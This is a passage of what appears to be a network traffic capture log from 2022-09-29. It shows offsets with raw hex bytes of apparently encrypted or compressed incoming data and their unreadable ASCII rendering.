                                                                                                        2022-09-29 12:46:30 UTC12988INData Raw: 01 b7 ed cf b4 52 cd b5 78 f5 a7 20 a6 3b 80 59 7a c4 9e f1 e1 7c 6a a4 75 ee fc 15 15 4d 44 5e ed 6f 5b 93 0b 6f 2f a3 c9 26 0d f3 9e cb 1a 1e f1 31 fc e4 8d 52 7f 02 cf 42 58 0c 1b e6 3a cc cb 30 51 90 48 09 2b 8a 45 c7 f4 20 00 0b 21 de e9 ea b3 0c b3 eb 4b 42 09 dc fe 23 87 c6 c0 52 11 a3 81 a1 c1 ac 17 c1 7e 7e 15 a1 1f 06 31 b1 94 3d 23 12 a8 93 d2 af 72 8f b8 13 6b ff 5e 81 2c eb c9 c5 98 ae cd d2 73 32 f0 cb 24 62 7a d6 fd e3 72 57 b0 40 15 af 33 2c b8 75 bf b9 05 df 97 02 3f e0 e4 74 6b f0 ba 37 2d d0 05 94 07 2a 26 43 86 56 8e 6d a9 34 79 5e 93 55 ca ee cd 4b fb 7e 05 4e ed 99 cd f8 0a 33 a5 90 d8 d6 71 99 33 5e 36 21 cb 22 db 2b 80 76 81 a3 56 3f 24 6f 31 40 2e 09 49 7f 8e 9d 72 ac c0 e3 46 ad 1c ae 8d 10 72 08 5e 10 b2 4a df 4a 2b 94 70 b4 3d
                                                                                                        Data Ascii: Rx ;Yz|juMD^o[o/&1RBX:0QH+E !KB#R~~1=#rk^,s2$bzrW@3,u?tk7-*&CVm4y^UK~N3q3^6!"+vV?$o1@.IrFr^JJ+p=
                                                                                                        2022-09-29 12:46:30 UTC13004INData Raw: 2f 70 28 ca 1b ee d6 a0 b0 5c a9 43 c6 da 56 48 17 b2 e4 f2 9f fc 92 7c 05 f6 3f ae 8d ce c6 8d 58 ca ef 7a 6c 7d 18 e4 74 78 02 d1 fd e0 4e 01 8c 28 14 d0 f9 bf ff 7c d8 41 26 e5 82 33 9b a6 df 59 dd a6 e0 3f f8 c5 a4 af 36 70 fd 19 b6 90 9a d8 51 90 ea 52 74 87 f9 65 4e 15 7d 14 15 23 97 ab 9d 35 cf e7 b1 05 54 2e 5a e9 72 e8 bb fb 4b 6f 1b af da 3d c0 df 87 e6 c5 e4 34 cd 2a aa 0f 9d 41 89 18 5d 3b 47 0f d3 02 69 6e bb 6d f0 15 33 a6 de 86 9b 55 f0 7c 3a cd bf 4a 5a 49 2d 1d 4c a4 58 cc 86 68 8c 5e 3e a7 81 d4 ec e4 fb 2a cb f4 49 84 07 82 ea 80 ba 29 b9 41 89 99 92 41 82 73 fa ba 30 ec cc a8 71 34 c8 bc 30 9b af a6 41 e3 a4 b7 80 e7 79 1f 84 e1 21 46 05 ba b5 74 e9 f6 68 cc 36 bf 90 0b b9 af c4 7b 50 b5 73 1f 10 5b bd 7e 3a 27 03 81 b2 70 93 d1 27 56
                                                                                                        Data Ascii: /p(\CVH|?Xzl}txN(|A&3Y?6pQRteN}#5T.ZrKo=4*A];Ginm3U|:JZI-LXh^>*I)AAs0q40Ay!Fth6{Ps[~:'p'V
                                                                                                        2022-09-29 12:46:30 UTC13020INData Raw: 98 e6 8e a6 20 15 66 dc cf e7 72 12 ba b8 a3 96 44 d1 76 e3 37 f6 92 a3 aa 61 4e 3b d2 f1 8b 58 b1 54 8e 70 39 8f 4e 51 c1 ed 3d f4 11 e0 43 0f da 71 bf ac 26 29 ff 9b e1 f8 e8 de 36 87 78 a9 f7 6e d6 02 f6 cf 9d cc 5c b4 9a 0f 2f 11 77 40 b7 d8 86 38 51 5c ef 3d c3 4d 9b ab 30 03 4a 18 50 35 cc ea 59 42 e0 5e e7 cc 8b 3f fc ba fb b9 96 ba 59 90 c2 1d 09 5f 13 45 4b ad 7f 6c 97 0b 4b e2 08 23 83 c7 f8 24 c0 69 cf 78 f7 97 11 35 46 13 f3 02 e5 0d 21 2b 18 f5 33 b3 e8 dc 67 20 23 d4 cc 1e e9 d4 68 68 01 85 af 7a dc cb 92 2d fd 86 4b 0e 84 cf e5 0d 13 04 dd 63 dd 95 1b 09 8b e9 0f 19 4b 8e 79 86 f8 42 bd 00 07 11 58 c0 58 80 f5 c3 63 b8 c6 f8 7f a7 6b d3 b4 bd 53 c1 3b 85 d5 0c 79 60 b6 13 1f a2 26 7c 18 aa 0a 2d 1b 88 bf 28 9a b5 30 56 11 4a c5 9f 4e 95 88
                                                                                                        Data Ascii: frDv7aN;XTp9NQ=Cq&)6xn\/w@8Q\=M0JP5YB^?Y_EKlK#$ix5F!+3g #hhz-KcKyBXXckS;y`&|-(0VJN
                                                                                                        2022-09-29 12:46:30 UTC13036INData Raw: 77 4d 50 c2 d9 5f a5 ae b0 15 15 17 74 48 84 f3 7f 05 0b df af c4 8b 18 c1 a5 30 87 64 44 19 ed ce 87 17 de ed 26 f3 6a 51 12 8d 0c 2c b4 0f 7b 19 6a 6c 07 9c ba 15 21 cd 7e 99 dc 99 eb fb ab fd 19 e7 fd 9b 2a b6 b9 e6 59 86 fc a6 97 f3 21 93 20 db 5b 4a 49 44 34 23 38 dd 36 6c 3f 6e 35 0a e0 bd 5f f8 4b d2 98 a2 90 9c 4b ba 32 33 ee 78 26 d4 40 48 5c 1a e2 ef b2 8a c2 9e bc a6 e9 96 ec cb 5a a9 f3 ab 4d 3c 72 67 ec 03 80 85 69 f8 87 aa 57 d5 a8 12 80 80 18 a3 29 aa ac 3e a0 8d f4 6c ef 3f 8c 45 96 34 88 b4 61 73 f4 85 b1 ed 75 23 12 e7 e4 e2 61 ce 93 db 23 7f 4b fc a0 7f 60 03 13 9d 86 1b 3e 03 17 fe 9e ac 4c 55 2e 72 29 78 25 a1 fa d4 79 df 85 13 f4 31 26 7e d0 77 44 4c 66 89 18 54 18 d1 8a dc bf c1 51 60 99 55 a9 8e 94 8c 4b 20 b6 cc 5f 0e ee b3 b1 64
                                                                                                        Data Ascii: wMP_tH0dD&jQ,{jl!~*Y! [JID4#86l?n5_KK23x&@H\ZM<rgiW)>l?E4asu#a#K`>LU.r)x%y1&~wDLfTQ`UK _d
                                                                                                        2022-09-29 12:46:30 UTC13052INData Raw: 77 e2 b6 fd 17 28 ab c2 29 0d dd c3 22 70 d1 ab d0 8a 69 05 d8 4c 24 4c 0c 4e 2a b1 5c 4d f3 a5 f9 e6 c3 55 e2 c0 2b 93 e3 eb be fd cc ea ca 67 e5 5d 9a fc d8 25 70 d4 ba e0 8a 08 1e ce 45 51 38 cd 1d b8 d9 df 0e 09 60 61 8f 5d 70 31 7c 60 3d 07 0f 18 75 06 d5 21 6e a6 03 e4 c9 ee ed ef 25 2f ef e3 43 de ad 06 ae 81 d1 e2 59 05 8c 97 91 13 5d b5 b8 d1 7d 68 ce 73 05 36 8f fa 41 fc 95 0a f4 7c 6c 0d 50 d7 16 7a d6 6e d6 6a fd 4b 76 c9 66 04 8a 17 d5 1b 48 a0 64 a1 8e 7f 3a a1 84 e8 9f 16 11 83 83 95 a4 4f 63 4d 0a fa 7d 33 e6 6f 05 1e 8b d3 da 1c ce 97 3d 64 b7 95 8b 4f 31 49 d7 5d 08 0a 16 c3 b7 91 15 c3 8c 51 05 44 e6 a5 1a ee c3 de e4 2b 53 2e 07 79 af b8 59 84 9f b5 01 1c 53 ec 98 97 d5 63 11 0e e6 86 18 84 c2 78 80 ed ef e2 b3 eb b4 1c 8e b4 bb 71 7d
                                                                                                        Data Ascii: w()"piL$LN*\MU+g]%pEQ8`a]p1|`=u!n%/CY]}hs6A|lPznjKvfHd:OcM}3o=dO1I]QD+S.yYScxq}
                                                                                                        2022-09-29 12:46:30 UTC13068INData Raw: 4d b7 8d 59 75 13 f3 b6 96 01 37 7f d0 f8 f8 7a a8 c7 be f8 e1 ab 90 81 d1 f1 1b b1 5c 35 0c 44 a7 06 7f 34 59 6f fa c1 bc 96 2e f5 21 45 84 62 6d ee c9 07 22 d9 2b 04 50 7f 95 16 61 e8 97 ad bf b9 65 42 3e 74 11 a6 55 d5 ba 51 72 22 bc d4 b0 a4 10 3c a0 cb f8 ac 33 96 69 36 64 f1 2c 72 83 f2 b4 90 d6 21 04 b3 bc 14 11 a8 b9 2c 65 01 6c 77 ca 22 09 b9 fc 28 cb 46 7f 2b 34 05 ec 1b 4c 9e 2f d6 f2 19 d6 75 94 20 eb b4 47 3f c5 91 79 17 2c 41 8a 53 04 ab 55 30 80 7e 2d 2c 95 32 43 90 26 f0 da c3 99 6e 6b d2 86 4b 52 cd 9d 3b 8d d8 83 e2 55 6c 86 72 3f e3 43 a1 88 c4 71 08 96 e3 ec 71 57 29 92 b1 49 b2 78 49 6d 34 52 a9 05 f2 25 61 59 f8 2a a0 87 d8 68 da 60 45 82 14 04 1d 39 8e f4 67 80 2b f2 41 34 f2 e8 a1 d4 3e 95 69 2b be 45 78 4c 17 89 d1 8e 4b b1 b6 15
                                                                                                        Data Ascii: MYu7z\5D4Yo.!Ebm"+PaeB>tUQr"<3i6d,r!,elw"(F+4L/u G?y,ASU0~-,2C&nkKR;Ulr?CqqW)IxIm4R%aY*h`E9g+A4>i+ExLK
                                                                                                        2022-09-29 12:46:30 UTC13084INData Raw: 86 e2 53 b8 b4 4d 0d ca 6a 45 1a 02 a3 00 aa e3 d4 e9 f0 ac a2 9a 15 ef 30 da 1c 71 09 25 b5 1f 7d 72 3c f2 e3 d4 81 82 4d 1c e3 6a d5 6a ce d3 fc 90 42 3c 87 f0 2d ac 62 f5 e3 4d e0 4b e7 bc ac c5 47 80 e2 9b 38 33 c0 a6 43 7b f5 41 f2 12 bd d6 cc 75 b3 98 79 2e 78 25 91 f8 55 89 07 82 36 4d da 28 94 36 aa 7a 3e ec 1f 26 90 74 7a 12 74 e2 e0 ba ea 0e 20 fd f3 c7 70 22 8b 82 8d d6 06 69 d1 dc 47 d3 7f dc c0 79 9a 08 74 e8 11 5b f2 d6 1f 36 a8 8e d4 42 f5 9a b1 e4 3e 0f 94 eb 80 ae cb 82 9d 98 77 12 e3 8b 48 fb 64 8f 30 2b 3c 94 72 ac 21 a5 52 bc d9 57 12 e2 47 14 f1 b5 23 2f 62 0e 81 e0 41 25 f3 95 a4 b7 7f c6 d6 77 ea 6b 54 ac 10 43 d0 c2 da 40 6a 13 b6 c9 66 ba bf 41 b3 1d c6 85 27 60 0f ae 9a 22 76 a1 42 3b 2e e8 8f 38 4f 56 8f b1 45 7b 48 d2 d9 75 c4
                                                                                                        Data Ascii: SMjE0q%}r<MjjB<-bMKG83C{Auy.x%U6M(6z>&tzt p"iGyt[6B>wHd0+<r!RWG#/bA%wkTC@jfA'`"vB;.8OVE{Hu
                                                                                                        2022-09-29 12:46:30 UTC13100INData Raw: 69 61 d3 c0 3e 09 23 c5 95 8e cc be 4d 60 d5 22 15 1d 90 0d 28 9f f7 01 08 b2 05 af 5d 61 36 00 7c 26 8d e9 40 2e 07 16 39 2a b7 ea d5 59 4a 38 8b e7 a5 e7 fd 07 91 5e 36 cd 55 0f 42 8b e8 4a 9b d2 9c c0 32 b0 6e b6 2f b8 3a 61 c1 f1 e0 7f 81 66 75 56 5b 13 31 70 e1 3c 45 e2 ca 08 db bd 55 3f f5 95 c5 3c 1b df e1 d4 ee 84 13 a0 36 64 07 1d f2 c6 e2 10 ff ff 01 78 a4 26 4a cf e6 8b 09 b3 37 a5 2b e8 27 92 36 b5 62 44 7d 56 c7 fb c8 9b 84 90 dc dd 86 9d 8c a1 1e 75 b3 78 bb 6a 22 a3 f2 5a d6 ca 36 b6 ab 06 c2 9c b0 d5 3f 5b c3 92 2d 7b a5 7b 4f d1 19 bb 01 5a 89 ed 81 2c 17 5f d8 45 8f 2e 9d 1c 04 c0 fa d3 46 f5 dd b9 dd f2 10 84 11 9e 1c c0 61 e1 29 9b 4d 35 e4 3a a5 19 cd 60 7c 3a 91 be 15 eb 43 c6 47 17 29 ea 47 33 d8 35 28 e9 ef 89 fa 73 c4 47 46 7e c2
                                                                                                        Data Ascii: ia>#M`"(]a6|&@.9*YJ8^6UBJ2n/:afuV[1p<EU?<6dx&J7+'6bD}Vuxj"Z6?[-{{OZ,_E.Fa)M5:`|:CG)G35(sGF~
                                                                                                        2022-09-29 12:46:30 UTC13116INData Raw: d6 cd 3e 22 52 d9 06 ed 3c 63 04 74 98 e8 7f 42 1e b7 d7 24 a3 98 af c2 e0 1d 88 c3 48 92 75 66 8f b3 98 97 f0 e0 63 64 b8 08 16 18 b0 f4 86 f7 c1 6b f7 63 8b 4e f9 86 4e 71 94 fd b6 0f ae a7 39 db d1 47 40 48 a9 ee ed ab ed 9b 1b a0 31 bf 91 3e 04 c5 7c 6b b8 d3 ea 7e 92 4c ed 95 1b 21 2f 8c 47 09 af 3a 85 d8 29 6e 38 d8 7b 79 5e cf e4 5d d5 87 cb 83 a7 5a e8 5a 34 97 0e 4b 04 64 25 83 b0 c1 dd 0b 29 6e 67 96 1c 9a 9b 74 41 c2 e9 d9 7d 94 05 df 34 b5 de 1b f2 86 d4 58 cc 00 9c 7a d2 e6 91 73 2a 15 59 40 d2 2c f5 d1 0b dc 47 82 68 bb 87 51 6d e4 7e 73 e4 8c f8 6e 0e 04 40 0f 6e 7a de d0 96 d6 0e c0 ca 0a 05 14 9f cb a0 08 ed 53 25 bd 3e 7c 15 9e b5 7c ef 98 5c fd 1d 3e fc 00 d0 0e 16 ac 04 ec b9 49 d5 84 9a cd 65 54 fb f7 81 a4 08 97 dc 30 35 46 40 4d be
                                                                                                        Data Ascii: >"R<ctB$HufcdkcNNq9G@H1>|k~L!/G:)n8{y^]ZZ4Kd%)ngtA}4Xzs*Y@,GhQm~sn@nzS%>||\>IeT05F@M
                                                                                                        2022-09-29 12:46:30 UTC13132INData Raw: 30 93 2d ad 51 8f 1b 68 74 6b e5 df 35 2b 17 1d 2e 65 b6 a4 d9 65 6e fe 25 47 c2 e4 a0 c8 35 6b bb 2c 2b 73 84 17 8e fa 96 e3 56 ef 5f f3 76 45 80 13 61 29 a6 c7 a1 8c c1 2a 9a b8 46 89 1b c6 fc 64 66 24 b8 a5 db 7e 6e be 94 a2 b6 31 0e e5 be e7 57 68 33 ec fa dd a4 31 b0 6b ec 6b 2a ee 66 a9 c8 23 38 0c f3 c3 5d 83 97 d3 23 12 31 33 b4 c7 6b 8e 78 74 26 38 80 b3 ce 7b 00 2b 6f b9 5c 5b 40 cf 2c 6a 9b 24 f8 74 d9 1d 07 1c 85 39 82 fb 8c 88 1f e5 cf 7b c2 17 00 f9 63 f2 11 b5 e0 f5 cf da db b0 78 d9 85 f7 be 3d c6 35 81 bd 35 5b cd 13 1d 99 d6 6e e7 bb 19 e8 d1 a7 2f f4 87 98 34 5b 01 42 94 7d 95 1e 61 4a 1d 80 24 df da f0 38 53 56 5f 3c 2f 60 d0 e5 28 08 4b d4 87 ec 89 99 d5 cf 3b fe 59 36 47 91 cb 40 b2 10 ca fa d9 83 d6 3d d6 e7 db 5a c6 50 43 13 c6 fa
                                                                                                        Data Ascii: 0-Qhtk5+.een%G5k,+sV_vEa)*Fdf$~n1Wh31kk*f#8]#13kxt&8{+o\[@,j$t9{cx=55[n/4[B}aJ$8SV_</`(K;Y6G@=ZPC
                                                                                                        2022-09-29 12:46:30 UTC13148INData Raw: a7 2f 6f ab 95 60 84 66 ef 1b fd 40 fb 84 6b 56 5f 81 5d 5a 38 69 9d 8b b4 1c 5d ee a6 92 02 ce e7 f7 ba d8 2d 25 ba 8f ff c9 dc 8b eb 3e 85 4b b0 a9 62 ce 20 0b 60 57 dc f5 7c fe 9a 6e 78 ae 44 8c f2 3a f3 8c 5d 95 0e 47 0f eb 59 73 32 6f 06 a7 51 9b 49 5d 23 2f ac 70 90 a8 87 b3 03 d5 95 87 53 09 65 fa 54 97 31 41 59 6f ea 4a e7 97 00 07 d3 4a 55 69 76 b8 7f 06 58 75 d5 21 15 1a e4 7c 55 f4 92 6f b7 4a c8 00 84 63 3c d0 ef d6 b8 b2 63 8c c1 e1 c6 33 ae ee f1 51 e3 28 a2 6c 87 01 97 9d 3a 16 01 f2 c0 9b 70 db 2b d3 bd c6 c7 8f a2 34 d5 f5 e9 6f 88 0b 58 04 67 96 a7 b3 51 d5 fa 7c 03 9d 66 c4 89 07 ed 8c e1 67 86 4d a7 80 58 c8 90 b5 23 bc 41 e5 76 9a 42 9d 66 6b 34 cf 3d 15 ef 3c 62 a6 e2 66 a2 4a 6a 79 d1 29 ba a0 75 ea 55 d4 1f d2 f0 b7 78 f1 6c 4f d0
                                                                                                        Data Ascii: /o`f@kV_]Z8i]-%>Kb `W|nxD:]GYs2oQI]#/pSeT1AYoJJUivXu!|UoJc<c3Q(l:p+4oXgQ|fgMX#AvBfk4=<bfJjy)uUxlO
                                                                                                        2022-09-29 12:46:30 UTC13164INData Raw: 98 e2 b8 4c bd 37 6f 67 3a 24 5b 42 27 50 6e 9e 26 87 8c f8 23 53 5b 2d 03 b3 90 d8 58 67 97 75 23 5d 02 7d 33 b7 c1 37 6d 26 3f 60 1b 1c 3f 84 3b fb cb 1d d4 f7 f5 65 50 d4 9c 1d aa a0 53 c4 22 14 d1 4e 85 13 17 38 aa 2a 1c f1 7b 5a 96 03 f5 89 36 e6 a2 39 d8 bf 23 d7 79 32 23 ac 05 9e b7 d3 80 4f 68 7d fe 9d 16 9e 8b 0e 10 94 4b c5 54 af 2b f0 53 f5 60 12 28 d7 9f 58 bf 59 9b 96 f6 36 a4 95 10 43 06 af 0b 2d e6 13 3b f0 c9 df 01 a2 83 d7 c0 ff a4 13 a7 6c 30 af 39 1e e7 a0 f4 4f 77 f5 99 07 8b 89 2b 5e 82 da 33 79 03 33 fc 1e 96 db 56 76 c8 de 8f 80 ca 62 74 5f 5a 09 06 d4 ef 7c 40 61 fd 69 eb e5 55 d3 4a 85 e4 e5 d9 fb fd c6 0a df e0 e1 db fb a3 45 93 0a 67 30 78 35 d1 5b 7d 23 cc 36 66 30 24 35 3a bc 86 cc 0c 1a a7 1f 86 c1 f2 82 3e 2e 5a bd 68 62 df
                                                                                                        Data Ascii: L7og:$[B'Pn&#S[-Xgu#]}37m&?`?;ePS"N8*{Z69#y2#Oh}KT+S`(XY6C-;l09Ow+^3y3Vvbt_Z|@aiUJEg0x5[}#6f0$5:>.Zhb
                                                                                                        2022-09-29 12:46:30 UTC13180INData Raw: 03 c5 cd 51 41 7f da 09 04 67 af 11 3d 02 0b 03 ba 41 49 3c 54 56 0d 80 3b 9f e7 3e fb 9a fc e3 bc 6d 83 24 eb ea f6 1d 28 a4 3d ec 66 43 53 90 fe 4b ab fc c3 72 dc 3c 17 d4 0b eb 7a 19 b2 ed c1 e0 57 a5 42 60 d2 86 d4 25 11 7e 85 5c 29 2c 7b 9d 91 e2 cb 9c ee c3 1a cb d3 2c cf 76 22 b6 4f dd 4c 7d dd 3c f9 83 db ac 17 a9 a4 c6 c8 4e 76 57 68 41 1f 43 46 8c af 83 fd a4 96 f8 70 a1 b6 64 0e ba c4 66 fc 18 af bb 88 96 06 79 94 e8 78 d5 b5 83 eb ad fa ec 48 2a 75 93 ec 4f 53 be f5 61 f9 d9 ad fb 98 35 82 6a ff 86 50 f6 7d b8 c4 9d 14 58 28 e3 16 8b 2d 73 08 35 7c d9 ce 4a 1b ac e2 34 fa 1c cd 64 1d a7 d2 48 42 e2 9c 8a 53 19 2e c3 f8 6d ba 85 2b 73 16 7b 3a c4 44 29 ee af ce cc 78 f5 e1 e4 ed f2 fc 62 32 a1 24 dd c9 8a b1 1d 90 5d 13 5c cf 7a 89 ab 86 81 95
                                                                                                        Data Ascii: QAg=AI<TV;>m$(=fCSKr<zWB`%~\),{,v"OL}<NvWhACFpdfyxH*uOSa5jP}X(-s5|J4dHBS.m+s{:D)xb2$]\z
                                                                                                        2022-09-29 12:46:30 UTC13196INData Raw: 4a a3 39 eb 75 ec 6a 71 bf 46 8d 32 11 1c 31 3d 7e 9e 26 e4 3f 5b 61 38 43 3d 9d 6c 84 cc 5e d0 53 c2 4c 1b 7c ac 4f 5b 10 cd 49 a7 3c f8 1a b6 53 c4 ef c2 6a 44 aa d0 60 5d 23 e1 51 c1 2d cd 29 94 7b 62 08 bd bd 81 3f d8 7a a6 99 af 2c b9 72 d0 bb b6 ff a2 42 32 5a 45 7d eb 5e f2 70 f6 be d1 1e c1 f2 00 b8 a8 2b 3a eb 50 cc 30 af c6 3b 93 b0 6d a6 ee e6 9f 6e 40 4c ab 01 9d 3c 78 ad 63 36 74 40 c6 f4 7c 93 d7 a6 7e 93 7a fd 9f e3 a6 70 2d 54 55 4b bd e2 e6 fd de 2f ed d1 4c 12 26 ee 8b 86 22 83 a0 a8 39 51 ec a3 30 e3 4c 59 f3 be e8 65 87 78 08 07 36 79 53 02 eb 70 9a f4 b2 c0 c3 69 7b e3 2d 3f ef 57 6e 42 ae 49 ac 91 16 13 bb f0 57 32 f6 89 2d df 16 e9 93 8b eb 27 a2 49 a6 87 af bd cf 2e df 5b 19 0c 4b c9 17 6b af 98 1c 6d 98 68 73 27 ed 28 a8 a9 9a 63
                                                                                                        Data Ascii: J9ujqF21=~&?[a8C=l^SL|O[I<SjD`]#Q-){b?z,rB2ZE}^p+:P0;mn@L<xc6t@|~zp-TUK/L&"9Q0LYex6ySpi{-?WnBIW2-'I.[Kkmhs'(c
                                                                                                        2022-09-29 12:46:30 UTC13212INData Raw: 91 71 d1 9d 50 52 0f c3 74 cc 48 d2 29 49 58 d9 e5 d4 34 bd 38 f5 d1 12 82 fc 57 81 cf a0 f1 43 cf a4 36 08 02 01 b2 36 4b b1 d8 3d 35 e5 33 48 d6 e0 94 bc 44 c8 53 84 ae 63 5c 48 af cf 63 ab 60 59 a2 e7 2e 96 c2 0f 2f 55 f1 e0 39 20 83 03 b5 22 62 39 56 4a 62 26 ad bc ac 2c d4 11 34 7d 23 d9 e0 9a 27 aa 84 af 39 16 9d e7 77 5b 0e e2 26 8e 84 67 c5 96 0c 88 1d 88 ef 6d cb 2d d0 2f ed 6a 7a 2c c9 e6 6a da eb 68 7c 99 28 f8 88 6e 03 26 71 10 b4 c5 e2 d5 2f 01 13 23 45 80 6d 31 80 7e e1 26 07 92 77 aa 38 48 bf 16 cb f3 5e b3 7e 74 ce 60 a3 b5 5a b3 fd 41 bd 81 23 19 86 0b 83 49 dd aa e4 f5 37 ba b6 4c 63 2e 72 98 c6 88 f0 29 27 a5 7e 92 8e 86 3e 87 35 49 06 77 20 dc bd 88 20 8f 25 d9 61 47 98 40 13 d7 3c 99 8d 32 fa 5a 84 a4 0f 26 b7 90 7f 56 2f fd 88 a0 4f
                                                                                                        Data Ascii: qPRtH)IX48WC66K=53HDSc\Hc`Y./U9 "b9VJb&,4}#'9w[&gm-/jz,jh|(n&q/#Em1~&w8H^~t`ZA#I7Lc.r)'~>5Iw %aG@<2Z&V/O
                                                                                                        2022-09-29 12:46:30 UTC13228INData Raw: 6b fa 8c bc 81 ce da ce 0d f9 83 a0 d2 dd c0 b7 98 07 b3 e1 5d 39 88 99 94 15 18 6f d0 78 67 50 87 dd 42 43 02 c5 f8 2c 2c fd 2b d4 e4 61 e1 98 9a 90 de 31 9a 1c af b8 4c 62 65 47 28 92 03 9b 78 11 1d 5a 57 c7 a1 be d8 77 60 c1 06 c3 6c 55 d7 fc 27 5a 90 88 08 a0 78 c6 cd b1 79 fb b3 a2 8c 40 c3 f4 86 c5 56 43 de 2e 40 d7 cc 4e b3 a8 27 1f 96 67 62 68 89 6f d7 01 b6 f2 1c 7d b7 fc 27 1c 21 3b 62 99 c3 5e 7a 7c 7e 59 bf a1 7e cd ae 63 2b 9b bc b3 ec 23 66 53 4b 3b a9 b4 c7 a5 64 e3 ea 87 7a cc 01 8a 7b e7 25 1e 77 3f 07 24 90 ee 5a d2 6d 16 8a 8c 2a 0c cb 38 25 16 b6 0e d2 39 66 b0 eb a2 03 3e 74 dd a4 10 d1 fc 65 13 8b 00 6e 0e b4 8e e8 67 ac fd a5 26 2f a8 15 5b 2f fd 6a db 16 20 f2 78 23 25 dc d1 30 5c cd c6 19 90 5b d1 1e fd b3 87 b6 30 41 88 0e 1a db
                                                                                                        Data Ascii: k]9oxgPBC,,+a1LbeG(xZWw`lU'Zxy@VC.@N'gbho}'!;b^z|~Y~c+#fSK;dz{%w?$Zm*8%9f>teng&/[/j x#%0\[0A
                                                                                                        2022-09-29 12:46:30 UTC13244INData Raw: 52 6f ff 41 ba 69 1a 62 3a 0a da 2f c2 36 38 2a b7 0e 8c fe dc fd 13 6a 3a 83 cc 1b c2 14 1e 3b c0 78 0d 85 08 3b 4a d9 53 ce 92 a2 68 98 dc 0f 80 77 6f b7 7c 35 f3 00 08 7b 5a 05 ff d9 29 1f ac e1 1b b6 1d fe a4 71 87 d1 ef cc 65 d5 e6 85 36 b1 f3 64 cf 42 81 47 58 bb 42 0c 82 58 ae 5b 24 92 d4 69 e3 b5 3c 7d b6 dc 9a 04 36 aa d0 64 c9 5c ac 83 7e 95 e3 9b 23 55 87 c0 d8 0d d0 ab 0e 10 3c 0c ca be 5b 88 49 9c 15 48 23 36 7d 5a 7d ec 7a a3 38 8d b9 9e d5 d2 5b ad db f3 87 5d a8 9d 7d 41 d9 b5 c8 e0 87 09 7a 67 83 dc ed e6 b3 ef f2 1c 72 d8 75 20 83 b8 81 62 ea 58 f7 36 37 2d c9 cc 18 45 0f db c7 3f 91 ca 2a 62 fd 62 52 93 7d 6e ae 88 05 a7 43 35 eb 38 ee cd e6 02 8a e5 31 45 b1 84 58 98 6d 5f 12 ab fb 38 80 b5 18 ed 53 d2 a7 29 2e 8a 0b 04 09 65 d5 ab 4b
                                                                                                        Data Ascii: RoAib:/68*j:;x;JShwo|5{Z)qe6dBGXBX[$i<}6d\~#U<[IH#6}Z}z8[]}Azgru bX67-E?*bbR}nC581EXm_8S).eK
                                                                                                        2022-09-29 12:46:30 UTC13260INData Raw: 50 c1 fb 7b 83 d8 37 16 f5 57 6f 21 99 5b 26 38 f9 7f 64 11 e1 4a 1d 6b 9e 4f db 45 b7 88 2e 56 fe f9 d4 e0 31 7a 35 40 79 bf fe eb 23 df 96 db c6 c3 43 6f c7 ee 82 08 78 0a 6d 40 db 60 b7 39 82 a4 5c ee c4 62 19 c9 68 f0 17 9d 9d 43 35 6e 05 4e cd 99 05 59 88 86 d7 39 8d e9 18 e6 1a 22 22 ee 6a bd f0 79 69 47 0e 39 f4 f7 d9 d7 f8 f0 6b 7c 01 ec fe ae 36 48 3d 35 0c de c5 f7 f7 71 66 c4 13 a1 86 3f b8 e4 e4 ff e3 aa d6 fa 3a 2c 8c 3a 74 58 72 a2 0a 3b c1 e5 fd 3f f9 e5 62 6b 8a 09 85 0d ee f8 20 14 8d 40 57 c0 9b 25 46 6f ae 9a 04 10 3f 5a 02 63 49 62 b2 98 2b 8b 34 ea d6 84 09 78 92 b2 03 36 c4 42 05 ab 9b 54 43 36 c7 61 eb 1f a1 ae fa 2f 09 ee 16 fa 03 e7 e6 76 f1 c7 ef 6a 09 f3 3f f4 d3 53 13 a1 b0 a8 e0 a0 7d a5 c4 9f a1 6a f5 04 75 ab d9 fd f5 dd 7b
                                                                                                        Data Ascii: P{7Wo![&8dJkOE.V1z5@y#Coxm@`9\bhC5nNY9""jyiG9k|6H=5qf?:,:tXr;?bk @W%Fo?ZcIb+4x6BTC6a/vj?S}ju{
                                                                                                        2022-09-29 12:46:30 UTC13276INData Raw: f4 29 76 e6 37 08 72 6e 27 52 55 6a 8c a8 72 4a a8 ce 36 af 7d 09 19 26 f5 d8 bc e7 60 53 82 05 c4 97 93 65 78 2e ba c4 10 14 a9 51 f3 4e a2 78 f4 88 7e 40 ea 8c e1 53 0b 86 fa 1c e5 32 f2 c6 99 e0 7b 66 d7 e5 7a 79 ed 87 3f 1c ef fd 16 c3 01 74 2a 8a 93 ea 15 6e f7 70 13 1e 36 bd 3f ac 81 30 0b 4e 4c a0 90 f1 11 09 b4 b1 ec eb f5 23 41 b4 c0 cd 07 1e 76 52 19 f8 81 eb 89 a3 1b f1 e5 50 ed f2 c1 b3 fe 9c 27 4a ae 7d 74 ed 8c 5d bd 4c 80 3a 38 c6 a5 33 47 37 69 ec bf 74 11 4b f4 79 d3 b9 46 8e 78 db e6 75 46 14 f1 cc 16 e3 f4 57 63 68 0a f8 4f 4b 21 00 d5 e1 ed bd de 37 f3 78 8b cf de 20 54 e6 90 6f 11 ab 05 dc 21 de e4 cb 9c bb f9 6d 42 c2 4a 1a 11 ba fa 94 49 86 73 30 ea b9 2a ce 61 a4 25 b5 b8 ab aa 96 73 d6 05 8c a6 5d 00 eb 54 5f 6e 60 1f ca 29 b9 d5
                                                                                                        Data Ascii: )v7rn'RUjrJ6}&`Sex.QNx~@S2{fzy?t*np6?0NL#AvRP'J}t]L:83G7itKyFxuFWchOK!7x To!mBJIs0*a%s]T_n`)
                                                                                                        2022-09-29 12:46:30 UTC13292INData Raw: fb 4b 35 b6 62 90 3a f3 9b d7 aa b2 04 5a a8 bd 3c be 11 82 d7 28 af e6 f1 0e 32 88 51 29 9a d1 35 26 0b 43 4f 5f 72 d3 cb bb 6a 1c 8a 21 74 8f e8 4a 35 3d 41 55 46 cd b2 51 f3 9a c0 05 bd e3 f0 3e 71 69 90 82 55 54 1e 8e ed 9f ef 9b 24 52 ab 7e 4c 8b 07 6d 78 2f 1d 5e 30 0c 34 4d 06 27 42 82 77 8e 34 31 a8 e3 9a be 3c cd 62 e1 93 9f 3f 73 44 b6 6d b9 f4 91 be 78 16 2f 62 94 37 ee 55 92 ae d1 f4 f4 ea fb 46 22 91 28 7d 0d c9 22 9c 3c 99 0d 30 8b ec 8a 10 5f ff 30 c1 5b d5 24 c5 32 39 10 2c 6b 82 22 1f a0 e0 f1 a9 12 e0 c2 1e 41 90 93 39 50 ce 69 e2 42 57 9d 07 a4 20 14 b1 f2 33 9b 0f bd 71 ba cd 